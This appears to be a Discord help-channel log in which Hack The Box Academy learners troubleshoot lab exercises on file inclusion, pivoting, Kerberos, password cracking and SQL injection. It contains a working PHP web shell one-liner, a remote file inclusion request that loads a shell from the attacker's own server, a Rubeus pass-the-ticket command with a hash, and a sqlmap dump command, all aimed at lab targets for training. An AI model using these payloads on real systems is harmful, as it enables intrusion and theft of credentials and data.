#modules
what's your question?
Actually I'm stuck at coding part of it if-else-fi
Conditional execution
35th generated value question
Share screenshot of question
is this the one where you have to base64 encode var 35 times?
yes
#!/bin/bash
# Count number of characters in a variable:
# echo $variable | wc -c
# Variable to encode
var="nef892na9s1p9asn2aJs71nIsm"
for counter in {1..40}
do
var=$(echo $var | base64)
done
lol
maybe
var = $( echo $var | base64 | wc -c)
for count in {1..35}
do
var = $( echo $var | base64 | wc -c)
done
idk
not correct
oh i know what the problem is
we have to use if-else
sorry bro i did this one long time ago, maybe someone else can help or forum.hackthebox
Hello! I'm stuck on the "Exploiting Web Vulnerabilities in Thick-Client Applications" part on "Attacking Common Applications" module. Can someone help me?
I literally did everything like the guide taught and still get the "Connection Error!" When trying to login with the fatty-client.
Yes, I googled and tried to re-do the steps and other tricks also but none are working so far :/
np
i didn't do it but i would say try restarting targets (sometimes happened the same thing with me in diff. modules)
You calculate the length after the encoding?
I'm resetting it now. Let's hope it works! It took the longest time ever to even spawn.
Lol, restarting worked. Now it was "login successful!" 😄 oh my god, this is so frustrating when you've wasted so much time and thought it was a skill issue but in fact it was a machine issue....
haha happens to everyone sometime : )
Yeah I figured it out thanks
i got a question on one on GPO abuse, after enumerating the GPO and found the one linked but disabled. It doesn't accept the answer, neither with name, GUID or anything, what is it looking for the format?
Should be the name
ok then i have the wrong name.. can i DM?
Has anyone completed the "Attacking Common Applications" -module? If so, do you agree that the thick-applications section is a NIGHTMARE? 😄
Sure
How is it faster to test web application this way when we need to input the cookie/access token anyways?
IMO this takes more time because we'll have to type out the entire query in the terminal rather than just searching and looking at the network tab in the browser
The web browser must parse the website and reload images and integrated scripts. cURL does not do this and is therefore faster. Especially for large and complex websites
Oh this makes sense. Forgot about that. Thanks 🙂
hey! so im struggling a little with the file inclusion skills assessment. Ive got the page vulnerable to RCE, and i can inject my payload however whenever i try to execute a command using <URL>&cmd=id the server crashes giving me a 500 internal error. Has this happened for anyone else? Ive restarted it about 8 times now with the same result each time.
try url?cmd=id
what shell is it?
<?php echo shell_exec($_GET['cmd']; ?> try that one
there is a missing ")" parenthesis.
good eye, just wrote it from memory and just woke up 😄
should be <?php echo shell_exec($_GET['cmd']); ?>
Thanks very much I'll try it shortly.
meterpreter > sysinfo
Computer : 10.129.190.184
OS : Ubuntu 20.04 (Linux 5.4.0-110-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > shell
[-] Error running command shell: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments
meterpreter > execute -f /bin/ls
[-] Error running command execute: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments
meterpreter >
any help ??
@jolly cradle Hi apologize for disturbing you but why don't I have permission to the general chat ?
go and follow the #welcome channel
ok thx
Damn that worked, thank you so much for the help!!!!
Anyone else have issues logging into sql server on attacking services hard skills asses?
Windows lateral movement skills assessment, the VNC portion. I have RDP via rossy, attempted to VNC using ipv4, ipv6, tried doing it with ports on tight vnc, tried to switch to wsus, tried to use sharpwsus, nothing useful has worked.
hey guys, i've been stuck on the Custom Wordlist section of Login Brute Forcing for a while, I've followed exactly along what the lesson instructs and I can't get valid login. A point in the right direction would be appreciated
You can DM if you are still stuck.
If you haven't searched this channel for others who might have asked a similar question, I would start there to see if that gets you unstuck first.
Hey, I'm a bit confused about AEN > Exploitation and Privilege Escalation. How is the ability to run MSSQL command on a website as a privileged user (at least a user that has SeImpersonatePrivilege) not considered a vulnerability? It has to be like at least something like `CWE-284 - Improper Access Control` doesn't it?
No, sounds more like a misconfiguration rather than improper access control.
cwe-732 maybe?
Hello,
I'm stuck on that box (Remote File Inclusion (RFI) of File Inclusion module)
My request http://94.237.51.163:44899/index.php?language=http://<MyTun0IP>:8080/shell.php&cmd=ls
My shell : sudo python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/)
but i go infinity loop and 0 traffic on my serv, do you have an idea ?
Whenever you have a target that specifies a port you're dealing with a public facing docker container. You can ping that IP from your host computer. That server can't reach your tun0 because your tun0 is on a private network.
Ok I understand now !
Thanks for that 🙂
I just looked at that module, the target that spawns in the Remote File Inclusion section doesn't use a public docker container, it's a target on the internal network. Maybe you're targeting the wrong IP.
Yes I attacked the wrapper box .. (2hours wasted 😅 )
with what?
the bot "fawn", at this question, " What is the command we need to run in order to display the 'ftp' client help menu?
" is the question "ftp -h"?
i already seen the tutorial and the right answer is "ftp -h" but "Error!
Incorrect task flag!"
best to include the module and section you're working on
i can't write on that channel
I know, I told you how you can if you read my full message.
yeah thanks
If a msf exploit has session in its options instead of rhost, how do I specify the victim box?
sounds like you'd already need an active session to import it into that or something
So ones like that can't be used first, they are only able to be added to an existing session?
based on what you're saying that's what i'd guess if it's asking for a session
@proud wigeon please make sure not to post content from modules above tier 0
just say the module/section/question you're stuck on, what you've tried, errors, etc. just don't post stuff from the module like the password etc
ah ok, my bad. it was just because it was given in the content, it wasn't a secret or anything, apologies
basically im trying to use impacket to connect to the service and it runs through how i should do it, i've replicated it exactly and it says the share isn't writeable, so im not sure whether it is expecting that?
hi if someone is kind enough to lend me a hand. I'm halfway through the cbbh path but never managed to find the answer to this one. it is so inconvenient since when continuing with the next section it redirects me here. the question is from https://academy.hackthebox.com/module/144/section/1253 i tried every method to make it work from changing conf files to messing with flags in dns enum but no luck. please its bugging my nerves so hard
i think (from memory) you have to fuzz the subdomains using gobuster vhost or ffuf
I am doing a HTB Academy exercise in the module "getting started" section "exploitation" and I can not make it work. can someone help me please? What exploit should I be using or how do i find it?
Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)
So far I got the exploit scanner/http/wp_simple_backup_file_read to work, but the file I get is not the flag.txt file. I scanned with nmap and visited the page in the browser, and it is using Simple Backup Plugin 2.7.10 for WordPress 5.6.1. I look for exploits for wordpress plugins or backup plugins or plugins in general, but I can not find the correct exploit
Look for simple backup plugin exploit
no luck
type 'options' and you can see there's a value you can change to change the file you read
that was HUGE help, thank you! i got the file now
Hey guys, just wondering if anyone had issues on the first bind shells exercise, I simply cant connect via SSH to htb-student to start the bind shell. Gets disconnected immediately
Can you visit the website in your browser?
it seems not? but i shouldnt need to connect to ovpn before or smth right?
Correct: so the issue may be with your system not being connected to the internet
seems like it. great time for my vm internet to crap out on me
Hey, I'm having trouble getting past Q7 in the Active Directory Enumeration & Attacks - Skills Assessment II, anyone who completed it can give me a nudge?
Hi for the SOCKS5 Tunneling with Chisel Section of Pivoting, Tunneling, and Port Forwarding module I am having an issue where I cannot ping the target box even when connected with the recommended VPN file. Can someone help me out? I turned my host VPN off. I was able to get the file onto it with the SCP protocol the way the section said to. How do I fix this connection, especially knowing that there is a way to connect?
can someone help me out with this?
Hiii
I can't SSH into the box which I need to do in order to do the section. Let me add that much.
because otherwise, the section doesn't work
is it a connection issue or a login issue?
connection
when I SSH it says no route to host
and I can't ping the host either
are you sure you are connected to the vpn?
yes
I disconnected and reconnected and tried again
and I'm connected on the currently recommended VPN with low load
I have tried several times it cannot connect
that one scp chisel command goes through
I don't even think pings are working
I tried pinging it 100% packet loss
do a ip route
ok
┌──(kali㉿kali)-[~/chisel]
└─$ ip route
default via 10.0.2.2 dev eth0 proto dhcp src 10.0.2.15 metric 100
10.0.2.0/24 dev eth0 proto kernel scope link src 10.0.2.15 metric 100
10.10.10.0/23 via 10.10.14.1 dev tun0
10.10.14.0/23 dev tun0 proto kernel scope link src 10.10.14.28
10.10.14.0/23 dev tun1 proto kernel scope link src 10.10.15.211
10.129.0.0/16 via 10.10.14.1 dev tun0
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1 linkdown
try pinging 10.10.14.1
weird then
the ping you are trying to do is to a 10.129.XXX.XXX network or a 172.16.XXX.XXX network?
I restarted it once
and yea, try this
I would pwnbox it to see if that works I mean I'm at a cafe
might not solve it, but can help you know if the issue is the pivot box or your machine
ok ya
good luck
ok
hi guys so I am getting these errors on the pivot host when I run chisel after transferring it over:
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)
this is for pivoting tunneling and port forwarding module's SOCKS5 tunneling with chisel section
also the VPN connection to it won't work I had to connect via Pwnbox, which is a big problem
I literally couldn't even ping the host from my VM even with my host Mullvad VPN turned off
like I tried doing ip route and had a connection to the HTB network so I don't know what gives
I determined the issue is with my VM but I don't know what to do about it
but even when logged into pwnbox I ssh into the Ubuntu server and it can't run chisel
You'll need to either statically compile chisel or download an older version
ok thanks
the pivot box cannot connect to the internet
and it won't let me transfer files over from pwnbox
isn't the target the pivot host? it doesn't give you ssh/rdp creds?
it does
and I can ssh into it but
you should be able to transfer files, have you completed the file transfer module?
it only lets me transfer from chisel build files but not others
I completed the file transfer module. I tried transferring with SCP. Are you saying I should do it with FTP?
the section says to do it with SCP which is why I'm confused
like so I FTP the whole folder into it?
why can't you use scp? it gives you ssh creds. scp is file transfer over ssh.
scp only transfers some files over but some files it won't let me transfer over
like test, build, etc. also I can't install go on the target box
so building it with go won't work
like it won't let me install or use go
you just need to transfer the chisel binary
I did
as i said, use an older version of chisel or statically compile it
How can I be very well prepared for offshore? What sources should I study from?
why doesn't it work with my local VM even when I turn off host VPN and the HTB VPN connects fine
Best to ask in #1263635449335910531. You'll need to follow the instructions in #welcome to access that channel.
this question lacks info. why doesn't what work with your local vpn?
I have no access
I can't ping the target server
I know. That's why i told you how to get access in the previous message.
from my VM even with mullvad turned off on host
Your VM has no connection with the internal vlan only the pivot host. The pivot host has 2 nics.
I connected to the HTB network with HTB VPN tho just fine
and that's why I think this is weird
so you should be able to reach the pivot host (the target you spawn)
but I'm not
scp won't work from vpn and cannot ping it
Do you have the pwnbox on still?
well that's why. the pwnbox and your vm use the same IP.
it's going to cause network problems when you have 2 machines fighting for the same IP
they do? I haven't had them on at same time
one or the other
I only had VM on when using VM
reboot your pc, re-download the vpn file and try again then
ok
you should be able to reach the target you spawn just like any other lab
ok thanks
will do. talk to you in a couple minutes after reboot then
ok I did a reboot and tried redownloading vpn file
and turned off mullvad on host os
and it didn't work. should I try a different VPN file?
wait I got it to connect
ok now its taking time to scp chisel to target host from VM
ok I think I figured out how to get the VM working but I'm gonna try and finish tonight
Please don't ping random people.. if you need help you can post your question
Information Gathering- Web Edition Module> FootPrinting Lab, question #2 asks which CMS is used on app.inlanefrieght.local. Using Wappalyzer it does not show CMS as something it's looking for.
Who me? I haven’t pinged anyone today
Except someone who already is DMing me
literally look at the message just above where the person pinged 2 different people
there's multiple ways to identify a CMS
Yes, I have an output of whatweb now, still not showing it. I do have host files correct.
you likely have it but don't realize it tbh
did you run it with the full verbosity?
I found it, I had one running with hostname and one without.
also deleting because it contains the answer to one of the other questions
one with hostname took a long while.
hostname is important
Agreed, just needed to be patient for whatweb.
yep patience reveals a lot
Not my strong suit. 
then the exams will kick your ass
Likely, but I'm in it to learn the hands on- if I pass then that's a bonus.
@split minnow please don't reveal information from the module such as usernames.
well hands on will require patience. not everything is instantaneous.
It's just command from the module, nothing new from me there
okay, sorry
Well, part of it is understanding tools, timeout of said tools, etc.
just reask the question literally that you had in #cape and someone who's done it may ask to dm to avoid spoilers
consider that if it's taking a minute then that may be a good thing
because it may be fetching information; thus taking a longer time
Windows lateral movement skills assessment if anyone ever has trouble with this, please do not hesitate to reach out to me. I found this to be outrageously difficult willing to help others. Literally almost gave up and would’ve paid for the rich boy walk-through
Good example, I had -a 1 selected, instead of -a 3/4. I did -a 1 on hostname scan while I did -a 3 on the direct IP.
you're given vhosts, use the vhosts
that's the bare minimum
the question asks against the specific hostname, so you're gonna run your scans against that specific hostname
Agreed, just trying to understand the tool is all. 🙂
well understanding the tool is well and good, but you should at least be using it as intended. Instead of throwing it at the IP, use the different flags on the requested hostname
it's much more powerful to get the information the question wants while messing with the tool
i.e. "what other ways could i get the answer"
I was scanning with the hostnames as intended after dumping IPs/hosts into host file. Also, I'm learning and whether that falls in scope with getting a flag or not I feel like that's important to some extent. I get what you are saying and I've always appreciated your input. I know discord text doesn't always come across great, but I get the sense you are aggravated at my input. I'll refrain from asking some future questions here until after I've exhausted all other avenues.
I'm not frustrated or aggravated lol. Just stating that getting useless output isn't helpful
This channel is also a really good resource to search through if you're stuck at a common place, for instance in the Linux Fundamentals module it's pretty common for most everyone to get stuck at the curl question for the filters section. A simple channel search will find a lot of hits of help for it

oh right ok
Do y’all understand lappalter’s module it literally says the same thing in her trait
? this channel is for assistance with the htb academy modules
Im in the wrong discord sorry peeps
Hey, I'm having trouble getting past Q7 in the Active Directory Enumeration & Attacks - Skills Assessment II, anyone who completed it can give me a nudge?
I've been staring at the QOR (Question-Oriented Relationship) mental model for a bit, going back and forth with ChatGPT on practicing said mental model. However It seems that I'm still fundamentally struggling with internalizing the methodology. Would anyone mind sparring over the subject to identify any gaps of knowledge?
Having a clear and constructive partner to exchange ideas and test scenarios would be very helpful.
People keep telling me to "pwn" stuff or do "ctf"s like my brother in christ im a gorilla
Also 100 humans can take one of my kind yes
what?
Remind me which one is Q7?
Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
It's after obtaining access to a MSSQL instance.
Look at your permissions
When converting the MSSQL instance to a shell, it runs as NT Service\MSSQL$SQLEXPRESS
iirc you should also be able to rdp
crap, tried lots of things but none of them was trying to RDP into the machine, brb
@harsh gorge I saw that
gj on pwning newest box so quickly btw, damn you fast as f, I got stuck at the stupidest stuff 
nvm, RDP (3389) is not open in the SQL01 machine
also, this account doesn't have any interesting permissions from what i've seen. cannot access the administrator account, debug privileges, nothing of use. although the user i logged in as (netdb) is sysadmin, although I'm not sure how to follow up from there. the module didn't touch that part so, even though I have been doing quite some research, i'm quite lost
You’re doing way better than me out there truth be told
nahh, you're so much better istg
Hello, you can send me a message 🙂
I got lost on this part too, but the road forward involves abusing some excessive privileges by using an exploit that works on Windows server 2019. Check out the Privileged Access section of the module
hi guys, I started doing HTB literally a few days ago, and up until now, I understand the point of the tasks I'm doing in the paths and I even managed to solve some tasks by myself
but most of the time, I have trouble figuring out what the answer is, even though I am 100% sure that I've done every single step from the question, I just cannot get the correct answer submitted
could someone help me with it, if possible?
Never mind, I just needed to ask for help, because you always find the answer the same second you ask for it xDDD
issue solved 😅
Re: applications of ai in infosec https://academy.hackthebox.com/module/292/section/3299
There's an example of using CountVectorizer for the bag-of-words approach. There's one matrix for unigrams and one for bigrams. But they are identical. I think this isn't supposed to be the case. I would have expected each combination of two words in the data set to appear but it's single words. And since I'm learning I'm not sure if this is actually an error or if I'm missing something.
Credential Hunting in Linux
I have a foothold into the host, but I'm absolutely lost with where to go, I've tried a couple of things and I can't seem to get anywhere, a nudge would be great, please @ with responses
Good Day fellas.
Please do anyone have the best walkthrough to pwn the knowledge test in getting started.
i got initial foothold but using the reverse php shell in the edit_theme.php isn't going through
once i entered the php code. and try saving the template.php file the getsimple website won't respond again.
how did you go about get the flag.txt
hey it was long back
letme check my notes
i GUESS i used one of the methods mentioned in the section above it
okay. thank you.
please do check
Guys hello I am using subbrute to find DNS records and find mistake like this googled but didn't find what this mistake means
/home/barth/subbrute/./subbrute.py:462: SyntaxWarning: invalid escape sequence '\.'
permute_filter = re.compile("^[a-zA-Z0-9]{" + str(self.permute_len) + "}\.")
Just finished the module HTTPs / TLS attacks, any doubts feel free to dm me, I’m following the web expert role
me too, I just finished that one also am currently half way through the abusing http misconfigurations
Did you find the skill assessment smooth? Of the TLS, it’s not hard, but I got into some problems that took me hours to figure out
Same its supposed to be like that, can add me if you want to bounce around some ideas on already completed modules if you like
hey, did you manage to solve it?
Hi
Hi all
which cars can be accessed with a simple VIP subscription?
Only Tesla I'm afraid 😦
laboratory machines 😄
All the retired ones I believe. But this section is all about HTB Academy, not HTB main platform so better to ask in other channel
@grizzled schooner something related to Firefox is your way to go.
Next time better to include on what module/section you are working on and on which part you got stuck
it's fine, I found the answer the same second I sent the message, but I will keep that in mind, thanks!!
oh thanks
I'm currently doing the windows privilege escalation credential hunting section and i'm wondering why the "findstr /SIM /C:"password" *.xml" command didnt find the .xml that had the password in it to answer question 1.
I had to manually search for it by looking through the user folders.
h
?
module password attacks, section pass the ticket, says: With Rubeus we performed an OverPass the Hash attack and retrieved the ticket in base64 format. Instead, we could use the flag /ptt to submit the ticket (TGT or TGS) to the current logon session. the command it uses is c:\tools> Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:3f74aa8f08f712f09cd5177b5c1ce50f /ptt how did it submit the ticket ? it says /ptt but it doesn't specify any ticket path
that command requests a TGT using plaintext's creds, then that TGT gets injected into the current session with /ptt
Hey guys, I need some help with Nocturnal. I'm stuck in the admin panel.
so it switches the user ? Since a new TGT means a another user ?
not necessarily. the ticket will simply be cached for your current session
For Kerberos authentication.
For local, it should be your own logon session
that ticket will probably be injected into a sacrificial process, so for that process, you'll be authenticated as that user
So with rubeus i can get a TGT using the user's NTLM hash
And with mimikatz i can open a process using the TGT and be authenticated as that user ?
And password as well

You can also use your PowerShell session to get access as that account
One. More. Question
Why all TGTs and kerberos keys are stored on a non DC machine ?
Anyone subscribed to student subscription anyone can give me a review of it?
Is it possible to accumulate cubes on that subscription?
Yes
I was thinking of getting it for a refresher on all the theory on pentest track since i have done CEH long back V7-8 idk which it is. Then dive into some adv modules.
Hello, hackthebox is down?
no
The academy, I mean?
What is "down", you might get better advice if you precisely describe your observations.
👍 thanks
Website is working for me, I'm logged into academy myself.
Jesus..ok, thank you for your advice
havent explained one bit
I hope that didn't come off as rude. I've worked in tech long enough to know that many people don't know to describe their problems in a way that facilitates a solution. We're in a high-tech environment so I wouldn't consider it rude to suggest describing your problem with a little more detail. I hope your issue is resolved.
If i get the monthly platinum subscription, do i get the 1000 cubes instantly or after a month? In my understanding i can just buy 1000 cubes for 68 usd
Yes, it wasn't polite!, Because the way you answer is like the others over here in this #module, you can't justify that you are high-tech to respond like that, especially if you have many people who want to learn.
My apologies. Rest assured we'll offer answers as good as your questions. 🙂
we good 👍
my internet seems to be up rn but i still get errors since some subdomains are on http and others on https so its not really working as intended
dns enum doesnt work either even if its shown to be the intended tool. pls is it too much to ask for someone to dm me the answer for https://academy.hackthebox.com/module/144/section/1253
Do you have to be an academy subscriber to get an account ID? Sorry for the noob Q
Hi there I need help from someone
Not just anybody, Help! I need somebody! Describe please XD
?
Name the module and section you're working in. If you're working on a module above tier 0, avoid posting spoilers or content, instead someone should reach out.
No it’s not a module, I simply need help on what module you guys recommend me to start if I’m barely starting cyber security and aim to become a pentester
No, just a HTB account
okay it seems it wasnt connected to discord, I have done that now
if it's modules specifically you're looking at, start with the "Operating System Fundamentals" or "Information Security Foundations" paths.
anyone could help me with this?
What credentials does Bob use with WinSCP to connect to the file server? (Format: username:password, Case-Sensitive)
Okok thank you
What if I’m finished let’s say with the beginner bible, is there like intermediate-advanced bibles?
I don't recall ever seeing any part II for the beginner's bible. Just start on one of the academy paths. If those paths are too introductory for you, you can do CPTS or CBBH for more advanced stuff.
Okok thank you so much again for the help
I can't get any variation of dir /a:h or ls -la to work with smbclient. Does anyone have a preferred method of listing hidden dirs?
yes, if I recall correctly a simple ls or dir (I can't remember if smbclient is picky) while providing the path will show all files, even hidden ones:
ls ./
dir ./
Yes, confirmed, either works and if you don't provide the ./ neither will show hidden files/directories. I don't see any mention of this when issuing "help dir" either, I noticed by accident... Alternative solution is you could mount the share locally and that can simplify things.
If my vm didn't just crash I would give that a try
thank you
It did work thank you again @shut vapor
Hello everyone
I need some help
Module {XSS}
Session hijacking
My PWNBOX server does receive GET requests I sent directly from the browser, but I have no response on any of the inputs. After some time trying, I looked up on the solutions sheet and copied the given script in the vulnerable input but I still have no hits on my server.
Yes, I made sure that I adapted the given script with my PWNIP:PWNPO
Any advice?
Hi, everyone. Can anyone help with this question? I am doing the CAPE certification course and it is located in Windows Lateral Movement > Windows Remote Management (WinRM)
Connect to DC01 as Leonvqz and read the flag located at C:\Users\Leonvqz\Desktop\flag.txt
||I established a tunnel using ligolo, but port 5985 on host SRV02 is not open. I also cannot RDP to that host.||
Solved it! Thank you!
You can DM me with what you've tried. I've got about 30 minutes until ~2100UTC
Hi, can someone please help me with the Whitelist Filters section in the File Upload Attacks module? I've been stuck on it for hours. I've used the wordlist the module provided and even added some extra extensions, I included the php shell code and the filename in my burp request, and ran through the wordlist and I'm either not getting any successful results or the web page will give me an error when I try to go to the uploaded files. Any help would be greatly appreciated.
Checking in again, I have tried multiple different ways of trying to get this and to still no luck. The question: (Sign the application myapp.apk and install it by either dragging and dropping it onto the device or using ADB. Make sure to first uninstall any previous versions of the app. After installation, tap on the app to start it. What is the message printed on the screen?)
Figure out the blacklist first, then try the whitelist. Theres different error messages for each of them.
Intro module is a slog lol
/feedback also gotta specify which intro module cos theres a lot
Module Fundamentals of AI : Skill Assessment
Here answer to this question is transformer architecture but while submitting it says that it's wrong. What am I supposed to do?
What deep learning architecture, known for its ability to process sequential data like text by capturing long-range dependencies between words through self-attention, forms the basis of large language models (LLMs) that can perform tasks such as translation, summarization, question answering, and creative writing?
Looking for a better understanding as I am a bit confused, but Module: Password Attacks Section Pass the Ticket (PtT) from Linux I'm on the second to last question, but am I supposed to transfer the KRB5 to my attackbox then use a port forward method if I am correct.
Oracle footprinting. i shouldn't have to install odat.py or sqlplus right? when i try to run both commands i get a "No such file or directory"
I think you do
is sqlplus bundled in with that oracle tool setup? if you recall?
they sound like different tools to me
hrmm, ok. i'll keep at it
Hey there... new here! Excited to learn some new skills. Greetings from Argentina!
Welcome!
Thanks!
Hey Gang, Im stuck on this module and this step im not sure how to complete. I open wireshark but im not sure how to get the file onto my instance. what am i missing?
which module/section
*Finding ARP Spoofing.
in wireshark, looking at the ARP_Poison.pcapng file and total packets at the bottom right. still getting the wrong answer.
You need to use filters
The question called for a certain opcode and MAC address, did you enter those both into the filter? you should get your answer with that
Module 23 section 252 - File Inclusion - Log Poisoning
I replicated the steps from the main explanation and also checked the step-by-step solution and the result is definitely not working as it was supposed.
The step to use index.php?language=session_poisoning don't work and I tested in many ways possible, I simply can't go through because this pending step
and whoever mentioned about it before, I don't know if they solved or had the same problem described
What do you mean language=session_poisoning? you should be pointing it to the access.log, right?
this is exactly the instruction on the section
http://<SERVER_IP>:<PORT>/index.php?language=session_poisoning
what no it's not
That's part of the PHP session poisoning section, not the Server Log poisoning section
you mean the php section then?
sorry i thought you meant the server log poisoning at first
so the modules show how to do it, the lab might not be a 1:1 but you have to apply the same concepts
oh I found the correct way, I was using the wrong sequence and didn't understand the "session poisoning" reference
I just entered the "URL encoded web shell" and it worked
ahh nice nice
I believe it was more my translation/interpretation problem than the question itself hehe, sorry and thanks of course for the help
Hi, I'm facing an issue in the Attack Tuning section of SQLMap. I'm trying to get the contents of flag5 table; i followed the command from the solution but it doesn't result in the expected output:
sqlmap -u 'http://83.136.251.68:52443/case5.php?id=*' --level 5 --risk 3 -T flag5 --batch --dump
results in
Database: testdb
Table: flag5
[1 entry]
+----+-------+
| id | conten |
+----+-------+
| 1 | <blank> |
+----+-------+
I also tried adding the --no-cast switch from the hint and it does not help
Database: testdb
Table: flag5
[1 entry]
+----+-------+
| id | conten |
+----+-------+
| 1 | |
+----+-------+
Ok I will there !
Click on the hyperlink..
I need some help with the Sliver C2 skills assessment. Question 3 about getting the DC. Having some trouble finding an account that will work on the DC and unsure if I've missed a step
if anyones done that module ....
Anyone who's doing Android Application Static Analysis module: 221 section: 2630. I have question regarding the 1st question: "Analyze the APK found inside the attached ZIP file. What is the value of the "message" key after logging into the remote service using the debugging code?"
hey i'm on password attacks module and psswd,shadow & Opasswd section
hey can someone help me with this module please ?
https://academy.hackthebox.com/module/51/section/1592
on finding the flag
hey i'm on password attacks module and psswd,shadow & Opasswd section
I got the root hash, and I tried cracking it with both rockyou and mutating the password.txt
i mutated the given resource password.txt with
:
c
so0
c so0
sa@
c sa@
c sa@ so0
$!
$! c
$! so0
$! sa@
$! c so0
$! c sa@
$! so0 sa@
$! c so0 sa@
@heavy swan over here! 
So, if you wanna get into bug bounty then yeah Bug Bounty path is the way to go. If you want to go the defensive route, then SOC path is the way. If you want to be more well-rounded pentester then Penetration Tester path is the way. The Web Exploits and Active Directory paths are both considered expert level paths so it'd be better to start with one of the other ones.
im here
so i want to learn to become bug bounty hunter i have some small knowledge as i tried soc analyst path but it wasnt for me
i want to get into bug bounty
Then yeah CBBH is the way to go, then most people grab the CWEE afterwards to learn more in depth.
what is CWEE?
Certified Web Exploitation Expert which is the Senior Web Penetration Tester path
oh okay thx
I will start with introduction to information security then will go for BBH
Just so you know where to find it: the Information Security Foundations path is under the Path -> Skills section of the academy website.
I found it already , but thank you for helping me :)))
hey @waxen totem ANY IDEA about where I'm going wrong
i posted my question above
i'm stuck on password attacks, psswd,shadow&opswwd section
all I know is that's definitely the wrong password list
use the mutated one then
yea using above mentioned rules I mutated the list
:
c
so0
c so0
sa@
c sa@
c sa@ so0
$!
$! c
$! so0
$! sa@
$! c so0
$! c sa@
$! so0 sa@
$! c so0 sa@
these r the rules i used to mutate the given password list
and then with the mutated list i tried hashcat, john
ntg worked
try rockyou ig
mhm it's running from an hour
so hopefully it works, I see that resources had better rules than the short one i posted above lemme re try
has any1 done the C2 Sliver skills assessment?
Hey I am a beginner. From where I need to start my journey?
probably the fundamental modules.
anyone has some idea where I can see when my annual sub expires ?
Should be at the purchase cubes
sadly nothing indicating it there
I guess I can always just check my email when I subscribed but still weird I cannot see anywhere
yeah, still got it until 6th of June
sorry Xoriath i had a question
https://academy.hackthebox.com/module/51/section/1592
for this flag
not to spoil any info but like how does that command pops a shell for a root user
Should be on your current plan
sadly not; I cancelled it after subscribing of course to prevent another unexpected taxation, maybe that is why ? (by cancelled meaning, cancelled the next payment that would automatically subscribe for another year)
Hey guys, how can I start hacking ? Can I just start with My MacBook ?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
what is the endpoint for that ? /billing ?
yeah, thanks for checking but nothing on my end
Ah sorry i couldnt be of more help
Probably emails is the only way to check i guess or through your banking
yeah already confirmed with email 🙂
Hi, im stuck at NoSQL Skill Assessment II, i made some progress but now stuck again. Can I DM someone?
sure!
I completed it, i'll DM you
only real ones pick on this /4294967295
its not fair breh it took 4 hours to figure this out
imagine if i could use GPT solve that thing in like 2 mins
Hi, Welcome to Hack the Box discord, if this is not regarding an Academy module you're in the wrong channel.
yeah it was i just couldnt leak info in here so i respect the chat
Yeah are you stuck on something or do you have a general question?
Hello i am in the footprinting modules of the cpts path , in the section of host based enumeration in the smb one
When i tried to connect to the share of the smb, it prompts with an error like that : Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 10.129.202.5 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
can you show the code you used to try to connect
While working on Log Poisoning. I was able to add php script in User agent but while executing got 500. What am I doing wrong?
can you scroll down for the first request and verify that you can see your user-agent in the logs? (don't inject a payload just yet, test the LFI first)
nope, I don't see it.
Then the LFI must not've worked
try the methods from the previous sections to find it first
best to keep in mind that the exercises at the end of the sections aren't designed completely like the examples provided, there's a bit of fiddling you have to do
Hi, sorry we can't help you here, contact your local law enforcement and ask if they can communicate with whatever country the person who's endangering you is in.
My parents will find out tho, no?
That should be the least of your worries it seems.
Dude it's my biggest, they will kill me
That'd be child abuse, if your parents harm you please contact your local law enforcement.
Kidding aside, it's still in your best interest to inform them, you made a mistake, own up to it.
Thank you
Here I was able to find it in User Agent. Then when injecting PHP I got 500.
Sure, I will do some fiddling.
looks like you have a stray backslash \
that might be useful when in bash/terminal but not in burp
What code are you using to connect to the share?
after removing it still I'm getting 500. Let me start over.
hey does this mean (ALL, !root) run with other user but ROOT ?
What module and section is this for? Please specify
Ahhh, ye (ALL, !root) from sudo -l does indicate you can run as any user but root
yessir i was on this the whole day
so interesting
Please remove the image as it spoils the Skills Assessment, instead mention the module and section.
what
Your image has spoilers, remove it, just say the module name and section name
how i can doing
Hi
Just ask your question again without the image, and say the module name, and section name.
for example: Linux Fundamentals module - Filtering section
okay sorry
i try again
I need some help with the Module AI. This is my last exercise his name is Skills assessment
i need help
on https://academy.hackthebox.com/module/147/section/1327
Password Attacks - Network Services
Find the user for the RDP service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.
i use hydra and it take long time . it normal , i use the provided list
try using crackmapexec
ok
ey guys I need a little help pls 🙂
smbclient -L //tragetip -N
with AI
Maybe try the -N next to -L instead of after the target ip
Or try restarting the target ip
Use 4 slashes at the beginning
Smbclient isn’t positional
It wouldn’t matter where he put it
As long as he has the syntax right it should be good
ey guys someone had finished the module AI?
why all offline ?
Need some help on the SA for windows lateral movement, anyone that can provide a hint? 🙂
Which module
ey guys someone had completed the module AI?
https://academy.hackthebox.com/module/237/section/2612 -> First question
In the Introduction to Digital Forensics -> Rapid Triage Examination & Analysis Tools -> first question
I did the exercise in a whole different way, after trying the way the exercise asks and didn't get the answer. If anyone could help me get the answer the way the exercise asks I'd appreciate the help
Would anyone mind giving any advice on the Shells & Payloads - The Live engagement questions. For Host 1, I seemingly am having a tough time finding the attack vector. For the hints, it states "if you look at status.inlanefreight.local or browse to IP on port 8080, you will see the vector". However trying to access the URI on my KALI VM, it always shows an error which I'm assuming its blocking outbound connections to HTTP. However, xfreerdp session on the foothold IP doesn't have any browser besides tor which needs internet connection. I've also tried using metasploit auxiliary scans which i found nothing. On top of it all, I tried establishing a bind shell with netcat and I can't get that to work as connections seemed to be refused everytime on my client machine. Any guidance?
